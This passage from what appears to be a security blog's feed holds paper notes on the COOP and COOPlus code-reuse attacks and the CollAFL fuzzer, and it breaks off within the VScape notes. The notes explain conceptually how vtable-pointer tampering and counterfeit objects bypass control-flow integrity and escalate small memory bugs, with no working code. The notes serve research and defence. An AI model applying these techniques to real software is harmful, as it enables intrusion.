基本攻击方法</h3><p>在说明攻击方法之前，先给出以下几个定义</p><ul><li><p>initial object （下称<strong>初始对象</strong>）：目标程序中被劫持的 C++ 对象，一切攻击从这里开始。</p></li><li><p>counterfeit objects（下称<strong>伪造对象</strong>）： 携带攻击者<strong>所选择的 vptr</strong> 和一些<strong>精心构建的数据字段</strong>，并被攻击者批量注入进可控内存中。正如名字所示，这个“对象“是攻击者手动伪造的。</p></li><li><p>Vfgadgets：COOP 攻击中将会使用到的<strong>虚函数</strong>。vfgadgets 的类型如下表所示：</p><p><img src="/2021/12/coop/image-20211202111754544.png" alt="image-20211202111754544"></p></li></ul><p>大体的定义已经在上面给出，接下来将详细说明攻击方式：</p><ol><li><p>首先，为了重复调用虚函数，COOP 攻击需要<strong>依赖 ML-G 类型的 vfgadget</strong>（即上面列表中的第一个条目）</p><blockquote><p>ML-G：可以理解成攻击的事件循环。它将遍历一个<strong>指向伪造对象的指针数组</strong>，并依次调用其中的<strong>虚函数</strong>。</p><p>这类 vfgadgets 在 C++ 应用程序中非常常见。</p></blockquote><p>如该图所示，图中的 <code>Course::~Course</code> 虚函数，即为ML-G 类型的 vfgadget。</p><p><img src="/2021/12/coop/image-20211202161904967.png" alt="image-20211202161904967"></p></li><li><p>接下来，攻击者将<strong>初始对象</strong>的内存，<strong>布局为类似 ML-G 的类的对象</strong>（例子中的目标对象为 Course）。</p><p>其中，初始对象中的 vptr，被攻击者修改为 Course 类的原始 vptr 相对偏移一点的地址。这是为了使得初始对象<strong>接下来的第一个虚函数调用</strong>，可以调用至<strong>目标的虚函数</strong>（即可调用至 ML-G vfgadgets）。</p><blockquote><p>注意，图中左边那块内存，是<strong>攻击者完全可控</strong>的。即攻击者在可控的内存内<strong>构建了一个完整的 Course 类对象</strong>，包括其内部成员的指针数组。</p><p>同时，字段 stutdents 指针数组所指向的各个 object，即为<strong>伪造对象</strong>，其 vptr 均可控。</p><p>还需要注意的是，由于伪造对象是攻击者自己伪造的，因此实际上伪造对象<strong>可以不是同一种类型</strong>，例如一种伪造对象是 string 类型，另一种伪造对象是 Student 类型。</p></blockquote><p><img src="/2021/12/coop/image-20211202162256571.png" alt="image-20211202162256571"></p></li><li><p>修改<strong>伪造对象的 vptr</strong>。由于伪造对象在被 ML-G 调用时，其调用目标可能不是攻击者所期望的 vfgadgets（例如Fig 1 中调用的是 <strong>Student::decCourseCount</strong> 函数），因此攻击者需要<strong>修改伪造对象的 vptr 指针</strong>，使得<strong>当伪造对象在虚函数调用点被调用时，可以调用到目标 vfgadget</strong>。</p><p>这里的修改可以从原先的 vtable 地址（例如 Student 的 vtable 地址）相对的前后偏移一点位置，使得此时的 vptr 指针指向了原先 vtable 地址向后一点的函数位置。</p><p>当上述三个步骤完成后，我们便可以通过<strong>操纵 伪造对象的 vptr</strong>，搭配 ML-G 类型的 vfgadget，来进行<strong>任意数量的 vfgadgets 
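calls</strong>.</p><p><img src="/2021/12/coop/image-20211202164733622.png" alt="image-20211202164733622"></p></li><li><p><strong>Overlap</strong> counterfeit objects. Two figures first; here are the memory layouts of two target classes and their vfgadgets:</p><p><img src="/2021/12/coop/image-20211202165553242.png" alt="image-20211202165553242"></p><p>Two vfgadgets are used:</p><ul><li>ARITH-G (arithmetic or logical operation) in class Exam: note that this function takes the sum of three member variables and <strong>writes it into another field of the current object</strong>.</li><li>W-G (write data to a target address) in class SimpleString: note that this function <strong>uses a field of the current object</strong> as the length of a copy operation.</li></ul><p>Look at the parts in bold above: one writes data, the other reads it. The attacker can therefore <strong>carefully overlap the memory of the two objects</strong> so that <strong>the length used by W-G is exactly the result computed by ARITH-G</strong>, which yields an out-of-bounds write.<br>The resulting memory layout is shown below; note that the ARITH-G gadget <strong>writes its result into the len field of the SimpleString object</strong>:</p><p><img src="/2021/12/coop/image-20211202170110810.png" alt="image-20211202170110810"></p><blockquote><p>You may wonder where SimpleString and Exam come into play.</p><p>In practice, the attacker carefully crafts objects of these two classes to serve as <strong>counterfeit objects</strong> for the ML-G, whose vfgadget then invokes their virtual functions.</p></blockquote></li></ol><p>That is the basic attack. The process can be viewed as <strong>single vcall -&gt; multiple vcalls -&gt; OOB</strong>. Note that the basic attack <strong>passes no arguments</strong> to the <strong>vfgadgets</strong>.</p><h3 id="4-vfgadget-参数传递">4. Passing Arguments to vfgadgets</h3><blockquote><p>How arguments are passed depends on the calling convention.</p></blockquote><h4 id="a-通过多个寄存器传递调用参数">a. Passing arguments in multiple registers</h4><ol><li>First, pick a suitable vfgadget and execute it so that <strong>counterfeit fields</strong> are loaded into the <strong>argument-passing registers</strong>.</li><li>Execute the target vfgadget, whose arguments take the values the previous vfgadget just set up.</li></ol><blockquote><p>This requires that <strong>the ML-G does not modify the argument registers</strong> (which also means it must not pass arguments to vfgadgets itself).</p></blockquote><h4 id="b-通过单个寄存器-栈传递调用参数">b. 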
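Passing arguments in a single register plus the stack</h4><blockquote><p>For example the thiscall calling convention: the this pointer is passed in ecx and the other arguments on the stack.</p></blockquote><p>Here argument passing relies on the ML-G main loop. The ML-G should pass a field of the <strong>initial object</strong> as an argument to every vfgadget (<strong>an ML-G that passes an argument is called an ML-ARG-G</strong>). The attacker can then deliver the intended arguments to the target vfgadget in one of the following ways:</p><ol><li><p>The argument passed is a <strong>pointer</strong> to scratch writable memory. Vfgadgets can then pass values to each other by reading and writing that memory, as in this example:</p><p><img src="/2021/12/coop/image-20211202205055482.png" alt="image-20211202205055482"></p><p>In the figure, the ML-G vfgadget <code>Course2::~Course2</code> passes the argument <code>id</code> to the other vfgadgets. <code>Student2::getLatestExam</code> in effect treats its parameter as a pointer, since <strong>a reference is a pointer under the hood</strong>. Inside that function the memory the parameter points to is modified at run time, so when the next vfgadget receives the argument it can <strong>read what the previous vfgadget left behind</strong>.</p></li><li><p>Rewriting the argument dynamically. The paper states that this approach lets the attacker <strong>pass arbitrary arguments to vfgadgets</strong>, but it <strong>requires a usable W-G vfgadget.</strong></p><blockquote><p>I have doubts about this approach for now, since to me it looks much the same as the first one.</p><p>Arguments are normally passed by value, so rewriting a local copy of an argument should not affect the value other vfgadgets receive.</p></blockquote><p>Vfgadgets of this kind that use a single field in isolation are relatively rare, so argument passing mostly relies on the first approach.</p></li></ol><h4 id="c-传递多个参数">c. Passing multiple arguments</h4><p>A figure first:</p><p><img src="/2021/12/coop/image-20211202210233297.png" alt="image-20211202210233297"></p><ul><li>If the invoked vfgadget actually uses <strong>fewer</strong> arguments than the ML-ARG-G passes, the extra arguments stay on the stack permanently (a vfgadget that does not use them will not clean them up). Invoke such vfgadgets a few times (i.e. push a few more times) and the stack ends up holding a prepared set of argument values.</li><li>If the invoked vfgadget actually uses <strong>more</strong> arguments than the ML-ARG-G passes, then on return it pops extra stack space for those "arguments", i.e. the stack pointer moves back the other way.</li></ul><h3 id="5-API-函数的调用">5. Calling API Functions</h3><p>A COOP attack can try to call WinAPI functions in three ways:</p><ol><li><p>Use a vfgadget that legitimately calls the WinAPI.</p><p>Drawback: not feasible in most cases.</p></li><li><p>Call the WinAPI from the ML-G as if it were a vfgadget.</p><p>Advantage: easy to implement, e.g. by pointing the vptr at tables such as the GOT, IAT or EAT.</p><p>Drawbacks:</p><ol><li>It violates goal G-2, failing to exhibit control flow and data flow <strong>similar to benign C++ code execution</strong>.</li><li>Because of the calling convention, the pointer to the counterfeit object is always passed to the WinAPI as the first argument.</li></ol></li><li><p>Use a vfgadget that <strong>calls a C-style function pointer</strong>. This requires a special kind of vfgadget, INV-G, such as the one in the figure below:</p><p><img src="/2021/12/coop/image-20211202211308760.png" alt="image-20211202211308760"></p></li></ol><h3 id="6-实现分支和跳转">6. 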
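Implementing Branches and Jumps</h3><p>COOP is Turing complete, so we need to explain how it implements branches and jumps.</p><p>Note that the ML-G uses an <strong>index</strong> to iterate over the counterfeit objects (for example an int index in a for loop, or a container iterator).</p><p>Using a W-COND-G vfgadget, a COOP attack can, when some condition holds, <strong>overwrite the ML-G's index</strong> or <strong>modify the pointer to the next counterfeit object to be visited</strong>.</p><p>Such an overwrite needs the address of the variable in question. If the index lives on the stack, the pushes and pops described above can be used to <strong>move the stack pointer</strong> and thereby <strong>modify the index at the target address</strong>.</p><p><img src="/2021/12/coop/image-20211202215512956.png" alt="image-20211202215512956"></p><h2 id="三、防护手法">III. Defenses</h2><p>The following approaches can prevent or mitigate COOP attacks:</p><ul><li><p>Generic defenses</p><ol><li>Restrict the legitimate callsites of APIs. It can be hard, however, to identify precisely the legitimate callsites of a given API function, and even with API calls restricted, COOP can still leak sensitive data.</li><li>Monitor the stack pointer for anomalies. For example, in 32-bit mode the stack pointer rises abnormally while COOP prepares arguments, but with the cdecl calling convention this kind of check has trouble telling malicious from benign behaviour.</li></ol></li><li><p>C++ semantics-aware defenses</p><ol><li>Verify that the vptr points to a legitimate vtable. The drawback is potentially high overhead.</li><li>Monitor data flow. Overhead may also be high.</li><li>Fine-grained randomization of C++ data structures, for example inserting random-sized padding between fields inside C++ objects, or fine-grained randomization of vtable locations and layout.</li></ol></li></ul>]]></content>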
    
    
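    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;ROP (return-oriented programming) is by now a very popular exploitation technique, and various mechanisms exist to protect programs against ROP attacks, such as shadow stacks. This 2015 paper presents a new exploitation technique called &lt;strong&gt;Counterfeit Object-Oriented Programming (COOP)&lt;/strong&gt;, which mounts attacks using only chains of existing virtual functions and callsites in the program. The attack is &lt;strong&gt;Turing complete&lt;/strong&gt;, i.e. it can perform arbitrary computation, including conditional branches.&lt;/p&gt;
&lt;p&gt;COOP can also bypass defenses that &lt;strong&gt;do not precisely take C++ object-oriented semantics into account&lt;/strong&gt;. Such defenses are not tailored to any particular language (C++, for example), so they naturally cannot stop COOP.&lt;/p&gt;
&lt;p&gt;The attack builds on a few properties of C++ virtual functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;C++ compilers implement &lt;strong&gt;vcalls (virtual function calls)&lt;/strong&gt; through the &lt;strong&gt;vtable (virtual function table)&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A vtable is an array of pointers to all of a class's virtual functions, including inherited ones.&lt;/p&gt;
&lt;p&gt;Judging from reverse engineering, vtables usually live in the .rodata section.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;For a class with virtual functions, the start of the object's memory (offset 0) holds a pointer to the vtable.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>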
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="virtual call" scheme="https://kiprey.github.io/tags/virtual-call/"/>
    
  </entry>
  
  <entry>
    <title>CollAFL - Path Sensitive Fuzzing: Paper Notes</title>
    <link href="https://kiprey.github.io/2021/11/collafl/"/>
    <id>https://kiprey.github.io/2021/11/collafl/</id>
    <published>2021-11-30T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.893Z</updated>
    
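    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Most existing fuzzers are guided by code coverage. AFL, for instance, guides testing with <strong>edge-based coverage information mapped into a hashmap</strong>. This coverage information is imprecise because it is <strong>only tracked at edge level</strong> and also <strong>suffers from hash collisions</strong>, which lose coverage information and hamper fuzzing.</p><p>The paper proposes a new approach with three goals:</p><ul><li>provide <strong>more accurate coverage information</strong></li><li><strong>mitigate</strong> path collisions</li><li>keep <strong>instrumentation overhead low</strong></li></ul><p>The paper also uses the coverage information to propose <strong>three new fuzzing strategies</strong> that speed up the discovery of new paths and vulnerabilities.</p><p>The figure below shows a complete fuzzing workflow; the parts highlighted in yellow are the paper's <strong>key ideas</strong>:</p><p><img src="/2021/11/collafl/image-20211201164140587.png" alt="image-20211201164140587"></p><span id="more"></span><h2 id="二、降低哈希碰撞策略">II. Reducing Hash Collisions</h2><h3 id="1-覆盖粒度">1. Coverage Granularity</h3><p>Coverage granularity broadly falls into three classes:</p><ul><li>block coverage</li><li>edge coverage</li><li>path coverage</li></ul><p>Each has its trade-offs:</p><ul><li><p>Block coverage: tracks the hit count of each block but <strong>not the order in which blocks execute</strong>.</p></li><li><p>Edge coverage: unlike block coverage, it <strong>tracks the execution order between two blocks</strong>.</p><p>It also tracks the hit count of each edge but <strong>not the order in which edges execute</strong>.</p></li><li><p>Path coverage: tracks <strong>the order in which edges execute</strong> and provides the most complete coverage information. However, given the sheer <strong>length</strong> and <strong>number</strong> of paths, tracking path coverage is prohibitively expensive and therefore impractical.</p></li></ul><p>Edge coverage is thus a compromise between <strong>feasibility</strong> and <strong>coverage information</strong>. In AFL, though, edge coverage can still lose information to hash collisions. Enlarging the bitmap does not eliminate collisions and severely slows AFL down (AFL scans the bitmap frequently to pick up new coverage).</p><p>The next section describes what CollAFL does to reduce the impact of hash collisions.</p><h3 id="2-降低哈希碰撞">2. 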
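Reducing Hash Collisions</h3><p>A quick reminder of how AFL computes its hash: $cur \oplus (prev&gt;&gt;1)$.</p><blockquote><p>Here cur and prev are the IDs of the current and previous basic block.</p><p>prev is shifted right to distinguish the edge A-&gt;B from B-&gt;A.</p><p>For details see my earlier notes: <a href="https://kiprey.github.io/2020/07/AFL-LLVM-Mode">AFL's LLVM_Mode</a>.</p></blockquote><p>CollAFL refines AFL's hash by introducing a triple <strong>(x,y,z)</strong> as hash parameters (the <strong>parameters</strong> below).</p><p>The hash of edge A-&gt;B is computed as $Fmul(cur, prev) = (cur &gt;&gt; x) \oplus (prev &gt;&gt; y) + z$.</p><blockquote><p>AFL's hash algorithm is the special case (x=0,y=1,z=0).</p><p>This also shows that Fmul costs about the same as AFL's hash.</p><p>Note that CollAFL chooses parameters per <strong>basic block</strong>, not per edge.</p></blockquote><p>CollAFL tunes the parameters to <strong>make sure every edge hash computed by Fmul is distinct</strong>. If the parameters chosen for each basic block give every edge a different hash, the collision problem is solved.</p><p>However, applications have too many basic blocks, so it is <strong>not possible to enumerate every basic block</strong> nor <strong>every parameter combination</strong>. In practice CollAFL therefore extends this equation and handles the following cases differently to lower the probability of hash collisions.</p><h4 id="a-基本块有多个前驱基本块">a. Basic blocks with multiple predecessors</h4><h5 id="1-CalcFmul">1) CalcFmul</h5><p>Initially CollAFL uses the Fmul equation above to compute incoming-edge hashes dynamically. Below is CollAFL's greedy search for suitable Fmul parameters:</p><p><img src="/2021/11/collafl/image-20211201203136198.png" alt="image-20211201203136198"></p><p>The inputs are</p><ul><li>the set of target basic blocks that have multiple predecessors</li><li>the mapping from basic blocks to basic-block IDs</li><li>the predecessor set of each target basic block</li></ul><p>If no <strong>collision-free parameters</strong> can be found for a basic block within the bounded set of (x,y,z) values, the block goes into the Unsol set; if suitable parameters are found, the block goes into the Solv set and the parameters are recorded in the Params map.</p><p>In the end calcFmul outputs four things:</p><ul><li>the set of solved basic blocks, Solv</li><li>the set of unsolved basic blocks, Unsol</li><li>the map from solved basic blocks to parameters, Params: $BasicBlock \to &lt;x,y,z&gt;$</li><li>the hash table at that point</li></ul><p>Note that Fmul cannot guarantee that a suitable choice of parameters <strong>prevents every hash collision</strong>, so calcFmul sets aside the basic blocks that could still collide for separate handling. What calcFmul does guarantee is that <strong>the basic blocks it solves are free of hash collisions</strong>.</p><p><strong>Fmul hashes must be computed at run time</strong>.</p><h5 id="2-CalcFhash">2) CalcFhash</h5><p>Next, CollAFL handles the basic blocks that still collide after calcFmul. For these blocks, which the $Fmul$ equation cannot solve, the new hash is called $Fhash$, obtained as follows:</p><p><img 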
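src="/2021/11/collafl/image-20211201204328429.png" alt="image-20211201204328429"></p><p>As shown, Fhash is obtained by <strong>assigning a random hash value to each incoming edge of each remaining unsolved basic block</strong>. When done, the algorithm outputs the resulting hash table and the hash values that are still unassigned.</p><p>At run time, Fhash is then a lookup in the previously generated <strong>HashMap</strong>: $Fhash(cur, prev) = hash\_table\_lookup(cur, prev)$.</p><p>Since a hash-table lookup is much slower than Fmul's arithmetic, the Unsol set must be kept as small as possible.</p><h4 id="b-基本块只有一个前驱基本块">b. Basic blocks with <strong>a single predecessor</strong></h4><p>If the current basic block has only one predecessor, the edge's end block is <strong>directly</strong> assigned a fresh hash that collides with no other: $Fsingle(cur, prev) = c$, where c is a constant distinct from all other hashes.</p><p>This assignment is <strong>performed after Fmul and Fhash have been computed for the other basic blocks</strong>, to avoid collisions as far as possible.</p><p>Because the assignment does not depend on run-time predecessor information (the block has only one predecessor), it can be hard-coded at instrumentation time; no hash needs to be computed at run time.</p><blockquote><p>Roughly 60% or more of basic blocks have a single incoming edge, so this assignment saves the fuzzer a lot of overhead.</p></blockquote><h4 id="c-整体解决方案">c. Overall solution</h4><p>First, <strong>make sure the hash space is larger than the number of edges</strong>; otherwise collisions are unavoidable.</p><p>Then follow the algorithms and steps described above:</p><p><img src="/2021/11/collafl/image-20211201205839792.png" alt="image-20211201205839792"></p><h3 id="3-开销分析">3. Overhead Analysis</h3><p>The costs of the hash schemes compare as follows: $cost(Fhash) &gt; cost(Fmul) &gt; cost(Fsingle) \approx 0$</p><p>Empirically, most basic blocks have a single incoming edge and very few are unsolved:</p><p>$num(Fsingle) &gt; num(Fmul) \gg num(Fhash) \approx 0$</p><p>Overall, then, CollAFL's collision-reduction scheme is quite practical.</p><h3 id="4-对间接调用的处理">4. 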
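Handling Indirect Calls</h3><p>Because static analysis is imprecise, some basic blocks that are <strong>reached through indirect calls</strong> may be misclassified as having <strong>a single predecessor or none</strong>, which hurts results in practice.</p><blockquote><p>That is, an indirectly called basic block may have no visible incoming call edge in the call graph.</p></blockquote><p>In its implementation CollAFL therefore marks the entry block of any function that is <strong>not called directly from any callsite</strong> as an entry block with <strong>multiple predecessors</strong>, i.e. it hashes it the multi-predecessor way (Fmul + Fhash) and never takes the Fsingle route.</p><p>CollAFL also expands indirect call instructions into a set of direct calls plus one indirect call, similar to <strong>devirtualization</strong> in gcc.</p><blockquote><p>Devirtualization in gcc means using a series of analyses to bind <strong>undetermined virtual callsites</strong> to <strong>concrete virtual functions</strong>, <strong>turning them into ordinary direct calls</strong> and removing the indirect virtual call.</p></blockquote><p>After these two steps, CollAFL has fewer basic blocks that are <strong>identified as having a single predecessor (or none)</strong>.</p><p>CollAFL's collision reduction only guarantees to <strong>eliminate collisions among known edges</strong>; given the limits of static analysis, hash collisions may still occur.</p><h2 id="三、种子变异策略">III. Seed Mutation Strategies</h2><p>The paper makes the following observations about seeds:</p><ul><li>If a path has many <strong>unexplored neighbour branches</strong> or <strong>unexplored neighbour descendants</strong>, mutating it is likely to uncover new paths.</li><li>If a path <strong>performs many memory accesses</strong>, it <strong>has some chance of triggering a latent memory bug</strong>, and <strong>mutations of it may trigger one as well</strong>.</li></ul><p>Based on these, it gives three equations for seed weights:</p><ul><li><p><strong>Unexplored neighbour branches</strong> strategy:</p><p>$$Weight\_Br(T) = \sum_{bb\in Path(T) \land &lt;bb, bb_i&gt;\in EDGES}IsUntouched(&lt;bb, bb_i&gt;) $$</p></li><li><p><strong>Unexplored neighbour descendants</strong> strategy:</p><p>$$Weight\_Desc(T)=\sum_{bb\in Path(T) \land IsUntouched(&lt;bb, bb_i&gt;)} NumDesc(bb_i)$$</p><p>$$NumDesc(bb) = \sum_{&lt;bb, bb_i&gt;\in EDGES} NumDesc(bb_i)$$</p></li><li><p><strong>Memory-access-heavy nodes</strong> strategy:<br>$$Weight\_Mem(T) = \sum_{bb\in Path(T)} NumMemInstr(bb)$$</p></li></ul><h2 id="四、评估">IV. Evaluation</h2><p>The evaluation has two parts: the effect of CollAFL's collision reduction and the effect of the seed strategies.</p><h3 id="1-降低哈希碰撞">1. Reducing Hash Collisions</h3><p>First, the hash collisions of AFL when fuzzing different projects; the collision ratio is fairly high:<br><img src="/2021/11/collafl/image-20211201214452781.png" alt="image-20211201214452781"></p><p>Next, the results for CollAFL's hashing; compared with AFL, CollAFL makes better use of the hash space and cuts the collision ratio dramatically:</p><p><img src="/2021/11/collafl/image-20211201214607544.png" alt="image-20211201214607544"></p><h3 id="2-种子变异">2. 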
Seed Mutation</h3><p>These are the results after running CollAFL for 200 hours with each of the three seed strategies:</p><p><img src="/2021/11/collafl/image-20211201214812985.png" alt="image-20211201214812985"></p><p>All three strategies found more crashes, a solid result.</p>]]></content>
    
    
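    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Most existing fuzzers are guided by code coverage. AFL, for instance, guides testing with &lt;strong&gt;edge-based coverage information mapped into a hashmap&lt;/strong&gt;. This coverage information is imprecise because it is &lt;strong&gt;only tracked at edge level&lt;/strong&gt; and also &lt;strong&gt;suffers from hash collisions&lt;/strong&gt;, which lose coverage information and hamper fuzzing.&lt;/p&gt;
&lt;p&gt;The paper proposes a new approach with three goals:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;provide &lt;strong&gt;more accurate coverage information&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;mitigate&lt;/strong&gt; path collisions&lt;/li&gt;
&lt;li&gt;keep &lt;strong&gt;instrumentation overhead low&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The paper also uses the coverage information to propose &lt;strong&gt;three new fuzzing strategies&lt;/strong&gt; that speed up the discovery of new paths and vulnerabilities.&lt;/p&gt;
&lt;p&gt;The figure below shows a complete fuzzing workflow; the parts highlighted in yellow are the paper's &lt;strong&gt;key ideas&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/2021/11/collafl/image-20211201164140587.png&quot; alt=&quot;image-20211201164140587&quot;&gt;&lt;/p&gt;</summary>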
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="AFL" scheme="https://kiprey.github.io/tags/AFL/"/>
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>VScape - Assessing and Escaping Virtual Call Protections: Paper Notes</title>
    <link href="https://kiprey.github.io/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/"/>
    <id>https://kiprey.github.io/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/</id>
    <published>2021-11-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.795Z</updated>
    
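    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>This paper presents a <strong>strengthened variant</strong> of Counterfeit Object-Oriented Programming (COOP), called <strong>COOPlus</strong>. Among virtual call protections that do not break the C++ ABI, a considerable share are vulnerable to COOPlus.</p><p><strong>Virtual calls that meet the following three conditions are vulnerable to COOPlus:</strong></p><ul><li><strong>the virtual call ABI is not broken</strong></li><li><strong>the integrity of C++ objects' vtable pointers is not guaranteed (i.e. they can be modified)</strong></li><li><strong>different functions may be invoked at a virtual callsite</strong></li></ul><p>COOPlus is in essence a <strong>code-reuse</strong> attack: at the target virtual callsite it invokes a virtual function that is <strong>type-compatible but out of context</strong>. The call passes C++ semantics-aware <strong>control-flow integrity (CFI)</strong> checks, but because the calling context differs, it can lead to further exploitation.</p><p>Besides COOPlus, the paper proposes <strong>VScape</strong>, a solution for assessing the effectiveness of protections against virtual call attacks.</p><p>Paper + slides - <a href="https://www.usenix.org/conference/usenixsecurity21/presentation/chen-kaixiang">USENIX security 21</a></p><span id="more"></span><h2 id="二、虚拟调用保护">II. Virtual Call Protections</h2><p>Before going further into COOPlus, we need to look at existing virtual call protections.</p><p>Since most vtable hijacking attacks involve <strong>tampering with the vptr</strong>, one simple approach is to <strong>ensure vptr integrity</strong>, for example with <strong>generic data-flow integrity (DFI)</strong>. Such techniques tend to be imprecise and incur high run-time overhead, so they are not very practical.</p><p>Another approach <strong>breaks the C++ ABI</strong>. For example, some protections move the vptr into a separate metadata table and use hardware features (such as Intel Memory Protection Extensions) to ensure the table's integrity and prevent vptr tampering. Because the ABI is broken, these protections cause serious compatibility problems and are not very practical either.</p><p>The third approach is to <strong>check the validity of every virtual call target</strong>. This was also used in a paper I read earlier, "SHARD: Fine-Grained Kernel Specialization with Context-Aware Hardening": checking the validity of the location the vptr points to confirms whether the virtual function being called is the right one.</p><p>CFI solutions all aim for both security and practicality. Coarse-grained CFI (which ignores C++ semantics or type information) cannot stop virtual call attacks, whereas fine-grained CFI solutions take more information into account to provide stronger defense.</p><h2 id="三、-COOP-攻击">III. The COOP Attack</h2><p>Before describing COOPlus we have to cover COOP itself, to understand what COOPlus improves. This paper says little about COOP, so I looked up the paper that introduced COOP and skimmed it.</p><p>COOP stands for Counterfeit Object-Oriented Programming. It was first proposed in 2015, and its paper has since been cited more than three hundred times.</p><p>For reasons of space, COOP is covered in a separate post.</p><h2 id="四、COOPlus-攻击">IV. The COOPlus Attack</h2><p>The goal of COOPlus is to <strong>bypass C++ semantics-aware CFI solutions</strong>, so other mitigations (ASLR, DEP and so on) and other exploitation techniques are left aside for now.</p><p>Unlike COOP, COOPlus invokes <strong>type-compatible virtual functions</strong> to bypass stronger defenses.</p><p>The preconditions for COOPlus are:</p><ul><li><strong>vptr integrity is not guaranteed</strong></li><li><strong>an unbroken C++ 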
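ABI</strong></li><li><strong>a low-severity vulnerability exists, e.g. a one-byte out-of-bounds write (off-by-one)</strong></li></ul><p>The figure below shows how the attack works:</p><blockquote><p>A picture is worth a thousand words.</p></blockquote><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211130230054100.png" alt="image-20211130230054100"></p><p>In plain terms, the attack goes as follows:</p><p>Suppose there are three classes: the <strong>base class Base</strong>, <strong>S1 derived from Base</strong>, and <strong>S2, another class derived from Base</strong>. Whether S1 and S2 are themselves related by inheritance does not matter, as long as <strong>both S1 and S2 derive from Base</strong>.</p><ul><li><p>Find a virtual call in which <strong>a derived S1 object invokes a virtual function of Base</strong>, and hijack it.</p></li><li><p>Use the given vulnerability (e.g. a one-byte out-of-bounds write) to change the vptr of the <strong>derived class S1</strong> (the victim class) to <strong>the vptr of S2, another class derived from Base (the counterfeit class)</strong>.</p><blockquote><p>That is, <strong>both S1 and S2 derive from Base</strong>.</p><p>A vcall is made <strong>through a base-class pointer</strong>, and <strong>S1 and S2 are both derived from the base class</strong>, so the call passes C++ semantics-aware checks. <strong>Calling a derived class's virtual function through a base pointer is perfectly normal</strong>, so unless the protection is extremely fine-grained it cannot detect this kind of exploitation.</p><p>My guess is that this is exactly what lets COOPlus bypass a good share of <strong>C++ semantics-aware</strong> protections.</p></blockquote></li><li><p>Next, since the victim object's vptr has been replaced with that of the counterfeit class, every virtual call on the victim object ends up in the counterfeit class's virtual functions.</p><p>As the figure shows, when the victim object with the tampered vptr calls the virtual function <code>func1</code>, it no longer invokes <code>S1::func1</code> but <code>S2::func1</code>.</p><p>S2 and S1 have different layouts, so S2 may have fields that S1 lacks (such as <code>memberM</code> in the figure).</p><p>Since the S1 object runs S2's func1, memory is accessed beyond the bounds of the S1 object, resulting in an out-of-bounds access.</p></li></ul><p>Once an operation on the victim object can go out of bounds (the object it reaches is called the <strong>relay object</strong>), we can use that to carefully modify fields of the relay object, such as a length, to <strong>amplify the impact of the vulnerability</strong> (the original bug being a one-byte out-of-bounds write).</p><p>Depending on the counterfeit function, the usable vfgadgets fall roughly into these classes:</p><ul><li><p>Out-of-bound Read</p><ul><li>Ld-Ex-PC: reads controllable data from the target memory and <strong>loads it into the PC</strong></li><li>Ld-AW-Const: writes a <strong>constant value</strong> to the target memory</li><li>Ld-AW-nonCtrl: writes a <strong>non-constant, uncontrollable value</strong> to the target memory</li><li>Ld-AW-Ctrl: writes a <strong>controllable value</strong> to the target memory</li></ul><blockquote><p>Since all four gadgets are classified as OOB reads, I presume the <strong>target memory</strong> here refers to victim Object 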
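member variables, or some other specific heap region.</p></blockquote></li><li><p>Out-of-bound Write</p><ul><li>St-Ptr: writes a <strong>pointer value</strong> into the relay object. If the relay object can be manipulated, this can be used to bypass defenses such as ASLR.</li><li>St-nonPtr: writes a <strong>non-pointer value</strong> into the relay object, e.g. a huge value into the relay object's length field, enabling OOB read/write over a much larger range.</li></ul></li></ul><p>COOPlus needs no high-severity bug; a simple low-severity one is enough to amplify the impact, which makes it quite practical. The victim class and the counterfeit class are usually defined in the same module, so their vtables lie close together, and even a one-byte change to a vptr may yield another compatible vptr and a successful COOPlus attack.</p><p>Even so, the weaker the original vulnerability, the fewer COOPlus primitives are available. A one-byte out-of-bounds write, for example, can only move the vptr by about 255 bytes in either direction, which is a limited range.</p><h2 id="五、VScape">V. VScape</h2><h3 id="1-简介">1. Overview</h3><p>Given <strong>a target program</strong>, <strong>a vulnerability</strong> and <strong>the virtual call protection in use</strong>, deciding whether COOPlus can bypass the CFI protection is hard, especially for large programs.</p><p>This is because launching COOPlus requires a suitable primitive tuple <strong>(vcall, victim class, counterfeit class)</strong>, and in addition</p><ul><li>the function invoked by the virtual call must be a <strong>virtual function of the base class</strong></li><li>the counterfeit class and the victim class derive from a common base class but implement the virtual function differently</li><li>the vulnerability can be used to corrupt the victim class</li></ul><p>On top of that we have to generate input that triggers the target vcall, then the counterfeit function, and finally the out-of-bounds access, which is also a hard task.</p><p>The paper therefore proposes VScape, a solution that automatically compiles candidate primitives, keeps those that are practical and reachable, and assists in generating the final exploit that bypasses the vcall protection.</p><p>Below is VScape's overall architecture; each module is described in turn:</p><blockquote><p>We may rarely use this tool in practice, but studying the overall design is instructive in itself.</p></blockquote><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211130235053830.png" alt="image-20211130235053830"></p><h3 id="2-原语生成">2. 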
